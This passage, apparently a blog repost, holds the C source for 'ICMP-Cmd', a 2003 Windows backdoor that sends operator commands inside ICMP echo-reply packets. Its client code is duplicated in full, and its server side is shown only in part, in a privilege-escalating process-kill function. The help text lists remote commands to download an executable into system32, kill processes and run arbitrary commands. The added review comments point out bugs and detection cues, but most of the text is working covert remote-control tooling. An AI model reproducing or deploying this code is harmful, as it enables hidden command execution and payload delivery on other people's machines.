 *  - "enable SeDebugPrivilege -> OpenProcess -> TerminateProcess" from a
 *    service is a classic tamper pattern and a good detection candidate.
 *  - Diagnostics go to stdout via printf, which a service usually loses.
 *  - `bRet` is declared but never used.
 */
HANDLE hProcess = NULL,hProcessToken = NULL;
BOOL IsKilled = FALSE,bRet = FALSE;
__try
{
if ( ! OpenProcessToken(GetCurrentProcess(),TOKEN_ALL_ACCESS, & hProcessToken))
{
printf( " Open Current Process Token failed:%d " ,GetLastError());
__leave;
}
// printf(" Open Current Process Token ok!");
// SeDebugPrivilege lets OpenProcess bypass the target's DACL
if ( ! SetPrivilege(hProcessToken,SE_DEBUG_NAME,TRUE))
{
__leave;
}
printf( " SetPrivilege ok! " );
if ((hProcess = OpenProcess(PROCESS_ALL_ACCESS,FALSE,id)) == NULL)
{
printf( " Open Process %d failed:%d " ,id,GetLastError());
__leave;
}
// printf(" Open Process %d ok!",id);
if ( ! TerminateProcess(hProcess, 1 ))
{
printf( " TerminateProcess failed:%d " ,GetLastError());
__leave;
}
IsKilled = TRUE;
}
__finally
{
if (hProcessToken != NULL) CloseHandle(hProcessToken);
if (hProcess != NULL) CloseHandle(hProcess);
}
return (IsKilled);
}
上面代码是服务器端,client 端的代码很简单:
#include
<
winsock2.h
>
#include < stdio.h >
#include < stdlib.h >
#pragma comment(lib,"ws2_32.lib")
// Command line typed at the "ICMP-CMD>" prompt; copied into every outgoing packet.
// NOTE(review): main() reads it with fgets(SendMsg, 1024, stdin), a limit four
// times this size -- a long input line overruns this global buffer.
char SendMsg[ 256 ];
/* The IPv4 header, overlaid on a received raw-socket buffer by decode_resp().
 * NOTE(review): bit-field order and packing are compiler-defined; the code
 * relies on h_len occupying the low nibble of the first byte, which matches
 * the wire layout on MSVC/x86 but is not portable. Multi-byte fields are in
 * network byte order; only h_len is read by this program. */
typedef struct iphdr {
unsigned int h_len: 4 ; // 4-bit header length in 32-bit words (decode_resp multiplies by 4)
unsigned int version: 4 ; // 4-bit IP version, 4 = IPv4
unsigned char tos; // 8-bit type of service
unsigned short total_len; // 16-bit total length (bytes)
unsigned short ident; // 16-bit identification
unsigned short frag_and_flags; // 3-bit flags + 13-bit fragment offset
unsigned char ttl; // 8-bit time to live
unsigned char proto; // 8-bit protocol (TCP, UDP or other)
unsigned short checksum; // 16-bit IP header checksum
unsigned int sourceIP; // 32-bit source IP address
unsigned int destIP; // 32-bit destination IP address
}IpHeader;
/* ICMP header as built by fill_icmp_data() and parsed by decode_resp().
 * 12 bytes in total (1+1+2+2+2+4); decode_resp() hard-codes that as `12`. */
typedef struct _ihdr
{
BYTE i_type; // 8-bit type (this program always sends 0 = echo reply)
BYTE i_code; // 8-bit code
USHORT i_cksum; // 16-bit checksum over header + payload
USHORT i_id; // identifier (this program uses the process id)
USHORT i_seq; // sequence number; doubles as the fixed channel marker (1234 client->server, 4321 server->client)
ULONG timestamp; // timestamp (GetTickCount)
} IcmpHeader;
// process exit code used on Winsock initialisation failure
#define STATUS_FAILED 0xFFFF
// size of the send and receive buffers (larger than any ICMP payload this client builds)
#define MAX_PACKET 2000
// Payload extracted from a received packet. NOTE(review): decode_resp() copies
// exactly 1450 bytes into it and then prints it with "%s", so a payload that
// fills it leaves no NUL terminator.
char arg[ 1450 ];
// zero-initialised heap allocation; callers in this file never free the result
#define xmalloc(s) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, (s))
void fill_icmp_data( char * , int );
USHORT checksum(USHORT * , int );
void decode_resp( char * , int , struct sockaddr_in * ); // parse one received ICMP packet
void help( void );
void usage( char * prog);
int main( int argc, char * argv[])
{
/* Client (operator) side. argv[1] is the server's IP. Loop: read one line
 * from stdin, send it as the payload of an ICMP type-0 packet with seq
 * 1234 (see fill_icmp_data), then for ~1 s hand every ICMP packet that
 * arrives to decode_resp().
 *
 * Review notes:
 *  - fgets(SendMsg, 1024, stdin) exceeds the 256-byte SendMsg buffer.
 *  - socket() and both setsockopt() results are unchecked; a failed
 *    socket() lets INVALID_SOCKET flow into sendto().
 *  - icmp_data and recvbuf are xmalloc'ed on every iteration and never
 *    freed.
 *  - recvfrom() accepts ICMP from any source; `from` is never compared
 *    with `dest`, so the reply path is unauthenticated beyond the seq check.
 *  - The nested `if (!memcmp(...)) if (!strstr(...))` has no braces; the
 *    second if is the body of the first, which is fragile to edit.
 *  - `return 0` inside __try still runs __finally (SEH semantics).
 *  - NOTE(review): several literals (" Q ", " ICMP-CMD> ", " http:// "
 *    compared with memcmp length 7) look like they lost "\n" escapes when
 *    the listing was rendered; check against the original source.
 *  - Declarations follow statements, so this builds as C++ or C99+.
 */
char * ICMP_DEST_IP; // target host IP
char * recvbuf;
if (argc != 2 )
{
usage(argv[ 0 ]);
return 0 ;
}
ICMP_DEST_IP = argv[ 1 ]; // take the target IP from the command line
WSADATA wsaData;
SOCKET sockRaw;
struct sockaddr_in dest,from;
int datasize;
int fromlen = sizeof (from);
char * icmp_data;
if (WSAStartup(MAKEWORD( 2 , 2 ), & wsaData) != 0 )
{
fprintf(stderr, " WSAStartup failed: %d " , GetLastError());
ExitProcess(STATUS_FAILED);
}
// raw ICMP socket: needs elevated rights on current Windows; result unchecked
sockRaw = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP);
int timeout = 1000 ;
setsockopt(sockRaw, SOL_SOCKET, SO_SNDTIMEO, ( char * ) & timeout, sizeof (timeout));
timeout = 4000 ;
setsockopt(sockRaw, SOL_SOCKET, SO_RCVTIMEO, ( char * ) & timeout, sizeof (timeout));
memset( & dest, 0 , sizeof (dest));
dest.sin_addr.s_addr = inet_addr(ICMP_DEST_IP);
dest.sin_family = AF_INET;
usage(argv[ 0 ]);
__try{
for (;;){
printf( " ICMP-CMD> " );
fgets(SendMsg, 1024 ,stdin); // read the command line into SendMsg (limit exceeds the buffer, see above)
if ( ! strcmp(SendMsg, " Q " ) ||! strcmp(SendMsg, " q " ))ExitProcess( 0 );
if ( ! strcmp(SendMsg, " " )) continue ;
if ( ! strcmp(SendMsg, " H " ) ||! strcmp(SendMsg, " h " )){help(); continue ;}
if ( ! memcmp(SendMsg, " http:// " , 7 ))
if ( ! strstr(SendMsg, " - " )){printf( " FileName Error. Use "-FileName" " ); continue ;}
// bytes on the wire: command text + 12-byte ICMP header
datasize = strlen(SendMsg);
datasize += sizeof (IcmpHeader);
printf( " ICMP packet size is %d " ,datasize);
icmp_data = ( char * )xmalloc(MAX_PACKET);
recvbuf = ( char * )xmalloc(MAX_PACKET);
memset(icmp_data, 0 , MAX_PACKET);
fill_icmp_data(icmp_data, datasize);
// checksum field must be zero while the checksum is computed
((IcmpHeader * )icmp_data) -> i_cksum = 0 ;
((IcmpHeader * )icmp_data) -> i_cksum = checksum((USHORT * )icmp_data, datasize);
int bwrote = sendto(sockRaw, icmp_data, datasize, 0 , ( struct sockaddr * ) & dest, sizeof (dest));
if (bwrote == SOCKET_ERROR)
{
if (WSAGetLastError() == WSAETIMEDOUT) printf( " Timed out " );
fprintf(stderr, " sendto failed: %d " ,WSAGetLastError());
}
if (bwrote < datasize ) { // short send (or SOCKET_ERROR, which is negative) also ends the program
return 0 ;
}
printf( " Send Packet to %s Success! " ,argv[ 1 ]);
// collect replies for roughly one second
DWORD start = GetTickCount();
for (;;){
if ((GetTickCount() - start) >= 1000 ) break ;
memset(recvbuf, 0 ,MAX_PACKET);
int bread = recvfrom(sockRaw, recvbuf, MAX_PACKET, 0 , ( struct sockaddr * ) & from, & fromlen);
if (bread == SOCKET_ERROR)
{
if (WSAGetLastError() == WSAETIMEDOUT)
{
printf( " timed out " );
break ;
}
fprintf(stderr, " recvfrom failed: %d " , WSAGetLastError());
break ;
}
decode_resp(recvbuf, bread, & from);
}
} // end for
} // end try
__finally
{
if (sockRaw != INVALID_SOCKET) closesocket(sockRaw);
WSACleanup();
}
return 0 ;
}
USHORT checksum(USHORT * buffer, int size)
{
    /* One's-complement Internet checksum (RFC 1071) over `size` bytes,
     * summed 16 bits at a time; a trailing odd byte contributes its own
     * value. Returns the complemented, folded 16-bit sum. Used by both
     * ends to fill IcmpHeader.i_cksum. */
    unsigned long acc = 0;
    int remaining = size;
    const USHORT *word = buffer;

    /* whole 16-bit words */
    for (; remaining > 1; remaining -= (int)sizeof(USHORT)) {
        acc += *word++;
    }
    /* odd trailing byte, if any */
    if (remaining) {
        acc += *(const UCHAR *)word;
    }
    /* fold carries back into 16 bits; the first fold can itself carry */
    acc = (acc >> 16) + (acc & 0xffff);
    acc += acc >> 16;
    return (USHORT)(~acc);
}
void fill_icmp_data( char * icmp_data, int datasize)
{
/* Client side: write the ICMP header at the start of `icmp_data` and copy
 * the operator's command (global SendMsg) right after it.
 *  icmp_data - MAX_PACKET-byte zeroed buffer (see main)
 *  datasize  - unused here; main() passes the number of bytes it will send
 *
 * Review notes:
 *  - Type 0 / code 0 (echo reply) with the constant seq 1234 is the fixed
 *    client->server marker; it is sent in clear and never varies.
 *  - memcpy copies all sizeof(SendMsg) bytes regardless of datasize; it
 *    stays inside icmp_data, and only datasize bytes reach sendto().
 *  - i_cksum is not touched here; main() zeroes and computes it afterwards.
 */
IcmpHeader * icmp_hdr;
char * datapart;
icmp_hdr = (IcmpHeader * )icmp_data;
icmp_hdr -> i_type = 0 ;
icmp_hdr -> i_code = 0 ;
icmp_hdr -> i_id = (USHORT)GetCurrentProcessId();
icmp_hdr -> timestamp = GetTickCount();
icmp_hdr -> i_seq = 1234 ;
datapart = icmp_data + sizeof (IcmpHeader);
memcpy(datapart,SendMsg, sizeof (SendMsg));
}
void usage( char * prog)
{
    /* Banner plus the single accepted argument (the remote IP).
     * prog: argv[0]. Output only. */
    static const char *const head[] = {
        " =====Welcome to www.hackerxfiles.net====== ",
        " ",
        " ---[ ICMP-Cmd v1.0 beta, by gxisone ]--- ",
        " ---[ E-mail: gxisone@hotmail.com ]--- ",
        " ---[ 2003/8/15 ]--- ",
    };
    size_t i;
    for (i = 0; i < sizeof head / sizeof head[0]; i++) {
        fputs(head[i], stdout);     /* plain text, no conversion specifiers */
    }
    printf(" usage: %s RemoteIP ", prog);
    fputs(" Ctrl+C or Q/q to Quite H/h for help ", stdout);
}
void decode_resp( char * buf, int bytes, struct sockaddr_in * from)
{
/* Client side: called for every packet recvfrom() returns. Overlays the
 * IPv4 and ICMP headers on `buf` and, if the sequence number is the
 * server's marker (4321), prints the sender and the payload.
 *  buf   - raw packet starting at the IP header (recvbuf, MAX_PACKET bytes)
 *  bytes - byte count returned by recvfrom
 *  from  - peer address (printed only; never compared with the target)
 *
 * Review notes:
 *  - No length validation: iphdr/icmphdr are dereferenced without checking
 *    bytes >= iphdrlen + sizeof(IcmpHeader).
 *  - memcpy copies a fixed 1450 bytes regardless of `bytes`; that stays
 *    inside recvbuf (MAX_PACKET) but not inside the packet. `arg` is
 *    exactly 1450 bytes, so a payload that fills it leaves no NUL and
 *    printf("%s") over-reads.
 *  - `12` is sizeof(IcmpHeader) hard-coded.
 *  - The "password" is a constant cleartext seq value with no sender
 *    check; any ICMP packet carrying seq 4321 is printed as a reply.
 */
memset(arg, 0 , sizeof (arg));
IpHeader * iphdr;
IcmpHeader * icmphdr;
unsigned short iphdrlen;
iphdr = (IpHeader * )buf;
iphdrlen = iphdr -> h_len * 4 ; // header length field is in 32-bit words
icmphdr = (IcmpHeader * )(buf + iphdrlen);
if (icmphdr -> i_seq == 4321 ) // marker matches: print the data section
{
printf( " %d bytes from %s: " ,bytes, inet_ntoa(from -> sin_addr));
printf( " IcmpType %d " ,icmphdr -> i_type);
printf( " IcmpCode %d " ,icmphdr -> i_code);
printf( " " );
memcpy(arg,buf + iphdrlen + 12 , 1450 );
printf( " %s " ,arg);
}
else printf( " Other ICMP Packets! " );
}
void help( void )
{
    /* Print the interactive-prompt command reference. Output only. */
    static const char *const lines[] = {
        " ",
        " [http://127.0.0.1/hack.exe -admin.exe] (Download Files. Parth is //system32) ",
        " [pslist] (List the Process) ",
        " [pskill ID] (Kill the Process) ",
        " Command (run the command) ",
        " ",
    };
    const char *const *p;
    for (p = lines; p != lines + sizeof lines / sizeof lines[0]; p++) {
        fputs(*p, stdout);   /* no '%' in any line, so identical to printf */
    }
}
#include < stdio.h >
#include < stdlib.h >
#pragma comment(lib,"ws2_32.lib")
// Command line typed at the "ICMP-CMD>" prompt; copied into every outgoing packet.
// NOTE(review): main() reads it with fgets(SendMsg, 1024, stdin), a limit four
// times this size -- a long input line overruns this global buffer.
char SendMsg[ 256 ];
/* The IPv4 header, overlaid on a received raw-socket buffer by decode_resp().
 * NOTE(review): bit-field order and packing are compiler-defined; the code
 * relies on h_len occupying the low nibble of the first byte, which matches
 * the wire layout on MSVC/x86 but is not portable. Multi-byte fields are in
 * network byte order; only h_len is read by this program. */
typedef struct iphdr {
unsigned int h_len: 4 ; // 4-bit header length in 32-bit words (decode_resp multiplies by 4)
unsigned int version: 4 ; // 4-bit IP version, 4 = IPv4
unsigned char tos; // 8-bit type of service
unsigned short total_len; // 16-bit total length (bytes)
unsigned short ident; // 16-bit identification
unsigned short frag_and_flags; // 3-bit flags + 13-bit fragment offset
unsigned char ttl; // 8-bit time to live
unsigned char proto; // 8-bit protocol (TCP, UDP or other)
unsigned short checksum; // 16-bit IP header checksum
unsigned int sourceIP; // 32-bit source IP address
unsigned int destIP; // 32-bit destination IP address
}IpHeader;
/* ICMP header as built by fill_icmp_data() and parsed by decode_resp().
 * 12 bytes in total (1+1+2+2+2+4); decode_resp() hard-codes that as `12`. */
typedef struct _ihdr
{
BYTE i_type; // 8-bit type (this program always sends 0 = echo reply)
BYTE i_code; // 8-bit code
USHORT i_cksum; // 16-bit checksum over header + payload
USHORT i_id; // identifier (this program uses the process id)
USHORT i_seq; // sequence number; doubles as the fixed channel marker (1234 client->server, 4321 server->client)
ULONG timestamp; // timestamp (GetTickCount)
} IcmpHeader;
// process exit code used on Winsock initialisation failure
#define STATUS_FAILED 0xFFFF
// size of the send and receive buffers (larger than any ICMP payload this client builds)
#define MAX_PACKET 2000
// Payload extracted from a received packet. NOTE(review): decode_resp() copies
// exactly 1450 bytes into it and then prints it with "%s", so a payload that
// fills it leaves no NUL terminator.
char arg[ 1450 ];
// zero-initialised heap allocation; callers in this file never free the result
#define xmalloc(s) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, (s))
void fill_icmp_data( char * , int );
USHORT checksum(USHORT * , int );
void decode_resp( char * , int , struct sockaddr_in * ); // parse one received ICMP packet
void help( void );
void usage( char * prog);
int main( int argc, char * argv[])
{
/* Client (operator) side. argv[1] is the server's IP. Loop: read one line
 * from stdin, send it as the payload of an ICMP type-0 packet with seq
 * 1234 (see fill_icmp_data), then for ~1 s hand every ICMP packet that
 * arrives to decode_resp().
 *
 * Review notes:
 *  - fgets(SendMsg, 1024, stdin) exceeds the 256-byte SendMsg buffer.
 *  - socket() and both setsockopt() results are unchecked; a failed
 *    socket() lets INVALID_SOCKET flow into sendto().
 *  - icmp_data and recvbuf are xmalloc'ed on every iteration and never
 *    freed.
 *  - recvfrom() accepts ICMP from any source; `from` is never compared
 *    with `dest`, so the reply path is unauthenticated beyond the seq check.
 *  - The nested `if (!memcmp(...)) if (!strstr(...))` has no braces; the
 *    second if is the body of the first, which is fragile to edit.
 *  - `return 0` inside __try still runs __finally (SEH semantics).
 *  - NOTE(review): several literals (" Q ", " ICMP-CMD> ", " http:// "
 *    compared with memcmp length 7) look like they lost "\n" escapes when
 *    the listing was rendered; check against the original source.
 *  - Declarations follow statements, so this builds as C++ or C99+.
 */
char * ICMP_DEST_IP; // target host IP
char * recvbuf;
if (argc != 2 )
{
usage(argv[ 0 ]);
return 0 ;
}
ICMP_DEST_IP = argv[ 1 ]; // take the target IP from the command line
WSADATA wsaData;
SOCKET sockRaw;
struct sockaddr_in dest,from;
int datasize;
int fromlen = sizeof (from);
char * icmp_data;
if (WSAStartup(MAKEWORD( 2 , 2 ), & wsaData) != 0 )
{
fprintf(stderr, " WSAStartup failed: %d " , GetLastError());
ExitProcess(STATUS_FAILED);
}
// raw ICMP socket: needs elevated rights on current Windows; result unchecked
sockRaw = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP);
int timeout = 1000 ;
setsockopt(sockRaw, SOL_SOCKET, SO_SNDTIMEO, ( char * ) & timeout, sizeof (timeout));
timeout = 4000 ;
setsockopt(sockRaw, SOL_SOCKET, SO_RCVTIMEO, ( char * ) & timeout, sizeof (timeout));
memset( & dest, 0 , sizeof (dest));
dest.sin_addr.s_addr = inet_addr(ICMP_DEST_IP);
dest.sin_family = AF_INET;
usage(argv[ 0 ]);
__try{
for (;;){
printf( " ICMP-CMD> " );
fgets(SendMsg, 1024 ,stdin); // read the command line into SendMsg (limit exceeds the buffer, see above)
if ( ! strcmp(SendMsg, " Q " ) ||! strcmp(SendMsg, " q " ))ExitProcess( 0 );
if ( ! strcmp(SendMsg, " " )) continue ;
if ( ! strcmp(SendMsg, " H " ) ||! strcmp(SendMsg, " h " )){help(); continue ;}
if ( ! memcmp(SendMsg, " http:// " , 7 ))
if ( ! strstr(SendMsg, " - " )){printf( " FileName Error. Use "-FileName" " ); continue ;}
// bytes on the wire: command text + 12-byte ICMP header
datasize = strlen(SendMsg);
datasize += sizeof (IcmpHeader);
printf( " ICMP packet size is %d " ,datasize);
icmp_data = ( char * )xmalloc(MAX_PACKET);
recvbuf = ( char * )xmalloc(MAX_PACKET);
memset(icmp_data, 0 , MAX_PACKET);
fill_icmp_data(icmp_data, datasize);
// checksum field must be zero while the checksum is computed
((IcmpHeader * )icmp_data) -> i_cksum = 0 ;
((IcmpHeader * )icmp_data) -> i_cksum = checksum((USHORT * )icmp_data, datasize);
int bwrote = sendto(sockRaw, icmp_data, datasize, 0 , ( struct sockaddr * ) & dest, sizeof (dest));
if (bwrote == SOCKET_ERROR)
{
if (WSAGetLastError() == WSAETIMEDOUT) printf( " Timed out " );
fprintf(stderr, " sendto failed: %d " ,WSAGetLastError());
}
if (bwrote < datasize ) { // short send (or SOCKET_ERROR, which is negative) also ends the program
return 0 ;
}
printf( " Send Packet to %s Success! " ,argv[ 1 ]);
// collect replies for roughly one second
DWORD start = GetTickCount();
for (;;){
if ((GetTickCount() - start) >= 1000 ) break ;
memset(recvbuf, 0 ,MAX_PACKET);
int bread = recvfrom(sockRaw, recvbuf, MAX_PACKET, 0 , ( struct sockaddr * ) & from, & fromlen);
if (bread == SOCKET_ERROR)
{
if (WSAGetLastError() == WSAETIMEDOUT)
{
printf( " timed out " );
break ;
}
fprintf(stderr, " recvfrom failed: %d " , WSAGetLastError());
break ;
}
decode_resp(recvbuf, bread, & from);
}
} // end for
} // end try
__finally
{
if (sockRaw != INVALID_SOCKET) closesocket(sockRaw);
WSACleanup();
}
return 0 ;
}
USHORT checksum(USHORT * buffer, int size)
{
    /* One's-complement Internet checksum (RFC 1071) over `size` bytes,
     * summed 16 bits at a time; a trailing odd byte contributes its own
     * value. Returns the complemented, folded 16-bit sum. Used by both
     * ends to fill IcmpHeader.i_cksum. */
    unsigned long acc = 0;
    int remaining = size;
    const USHORT *word = buffer;

    /* whole 16-bit words */
    for (; remaining > 1; remaining -= (int)sizeof(USHORT)) {
        acc += *word++;
    }
    /* odd trailing byte, if any */
    if (remaining) {
        acc += *(const UCHAR *)word;
    }
    /* fold carries back into 16 bits; the first fold can itself carry */
    acc = (acc >> 16) + (acc & 0xffff);
    acc += acc >> 16;
    return (USHORT)(~acc);
}
void fill_icmp_data( char * icmp_data, int datasize)
{
/* Client side: write the ICMP header at the start of `icmp_data` and copy
 * the operator's command (global SendMsg) right after it.
 *  icmp_data - MAX_PACKET-byte zeroed buffer (see main)
 *  datasize  - unused here; main() passes the number of bytes it will send
 *
 * Review notes:
 *  - Type 0 / code 0 (echo reply) with the constant seq 1234 is the fixed
 *    client->server marker; it is sent in clear and never varies.
 *  - memcpy copies all sizeof(SendMsg) bytes regardless of datasize; it
 *    stays inside icmp_data, and only datasize bytes reach sendto().
 *  - i_cksum is not touched here; main() zeroes and computes it afterwards.
 */
IcmpHeader * icmp_hdr;
char * datapart;
icmp_hdr = (IcmpHeader * )icmp_data;
icmp_hdr -> i_type = 0 ;
icmp_hdr -> i_code = 0 ;
icmp_hdr -> i_id = (USHORT)GetCurrentProcessId();
icmp_hdr -> timestamp = GetTickCount();
icmp_hdr -> i_seq = 1234 ;
datapart = icmp_data + sizeof (IcmpHeader);
memcpy(datapart,SendMsg, sizeof (SendMsg));
}
void usage( char * prog)
{
    /* Banner plus the single accepted argument (the remote IP).
     * prog: argv[0]. Output only. */
    static const char *const head[] = {
        " =====Welcome to www.hackerxfiles.net====== ",
        " ",
        " ---[ ICMP-Cmd v1.0 beta, by gxisone ]--- ",
        " ---[ E-mail: gxisone@hotmail.com ]--- ",
        " ---[ 2003/8/15 ]--- ",
    };
    size_t i;
    for (i = 0; i < sizeof head / sizeof head[0]; i++) {
        fputs(head[i], stdout);     /* plain text, no conversion specifiers */
    }
    printf(" usage: %s RemoteIP ", prog);
    fputs(" Ctrl+C or Q/q to Quite H/h for help ", stdout);
}
void decode_resp( char * buf, int bytes, struct sockaddr_in * from)
{
/* Client side: called for every packet recvfrom() returns. Overlays the
 * IPv4 and ICMP headers on `buf` and, if the sequence number is the
 * server's marker (4321), prints the sender and the payload.
 *  buf   - raw packet starting at the IP header (recvbuf, MAX_PACKET bytes)
 *  bytes - byte count returned by recvfrom
 *  from  - peer address (printed only; never compared with the target)
 *
 * Review notes:
 *  - No length validation: iphdr/icmphdr are dereferenced without checking
 *    bytes >= iphdrlen + sizeof(IcmpHeader).
 *  - memcpy copies a fixed 1450 bytes regardless of `bytes`; that stays
 *    inside recvbuf (MAX_PACKET) but not inside the packet. `arg` is
 *    exactly 1450 bytes, so a payload that fills it leaves no NUL and
 *    printf("%s") over-reads.
 *  - `12` is sizeof(IcmpHeader) hard-coded.
 *  - The "password" is a constant cleartext seq value with no sender
 *    check; any ICMP packet carrying seq 4321 is printed as a reply.
 */
memset(arg, 0 , sizeof (arg));
IpHeader * iphdr;
IcmpHeader * icmphdr;
unsigned short iphdrlen;
iphdr = (IpHeader * )buf;
iphdrlen = iphdr -> h_len * 4 ; // header length field is in 32-bit words
icmphdr = (IcmpHeader * )(buf + iphdrlen);
if (icmphdr -> i_seq == 4321 ) // marker matches: print the data section
{
printf( " %d bytes from %s: " ,bytes, inet_ntoa(from -> sin_addr));
printf( " IcmpType %d " ,icmphdr -> i_type);
printf( " IcmpCode %d " ,icmphdr -> i_code);
printf( " " );
memcpy(arg,buf + iphdrlen + 12 , 1450 );
printf( " %s " ,arg);
}
else printf( " Other ICMP Packets! " );
}
void help( void )
{
    /* Print the interactive-prompt command reference. Output only. */
    static const char *const lines[] = {
        " ",
        " [http://127.0.0.1/hack.exe -admin.exe] (Download Files. Parth is //system32) ",
        " [pslist] (List the Process) ",
        " [pskill ID] (Kill the Process) ",
        " Command (run the command) ",
        " ",
    };
    const char *const *p;
    for (p = lines; p != lines + sizeof lines / sizeof lines[0]; p++) {
        fputs(*p, stdout);   /* no '%' in any line, so identical to printf */
    }
}